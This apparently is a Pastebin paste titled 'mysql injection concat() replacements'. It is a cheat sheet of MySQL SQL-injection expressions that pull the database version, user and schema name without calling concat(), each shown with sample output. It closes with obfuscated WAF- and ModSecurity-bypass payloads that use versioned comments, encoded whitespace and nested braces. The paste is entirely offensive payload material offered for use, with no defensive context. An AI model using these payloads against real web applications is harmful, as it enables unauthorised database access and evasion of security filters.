API tools faq
paste
Advertisement
Guest User

concat() replacements

a guest
Nov 20th, 2015
2,055
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.11 KB | None | 0 0
raw download clone embed print report
  1. mysql injection concat() replacements @sergey_lakantar
  2.  
  3. select export_set(1,version(),user(),' : ',2);
  4. 5.1.7 : my_user
  5.  
  6. select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);
  7. 5.1.7 : my_user : my_db
  8.  
  9. select make_set(7,version(),user(),schema());
  10. 5.1.7,my_user,my_db
  11.  
  12. select replace(make_set(7,version(),user(),schema()),',',' : ');
  13. 5.1.7 : my_user : my_db
  14.  
  15. select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ');
  16. 5.1.7 : my_user
  17.  
  18. select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : ');
  19. 5.1.7 : my_user : my_db
  20.  
  21. select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());
  22. 5.1.7 : my_user
  23.  
  24. select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());
  25. 5.1.7 : my_user : my_db
  26.  
  27. select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version())
  28. 5.1.7 : my_user
  29.  
  30. select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());
  31. 5.1.7 : my_user : my_db
  32.  
  33. select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());
  34. 5.1.7 : my_user
  35.  
  36. select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());
  37. 5.1.7 : my_user : my_db
  38.  
  39. group_concat() without comma-
  40. select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);
  41. 5.1.7 : my_user : my_db
  42.  
  43. concat() waf bypass-
  44. /*!50000group_coNcat(*/)
  45. /*!50000coNcat(*/)
  46. `coNcat`%0a%0b%0c%0d%a0()
  47. {snoopdogg concat()}
  48. {s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}
  49. {s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}
  50. {s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}}
  51. concat-- a%0a()
  52. concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)
  53. concat/**x**/()
  54.  
  55. Modsecurity-
  56. concat+()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!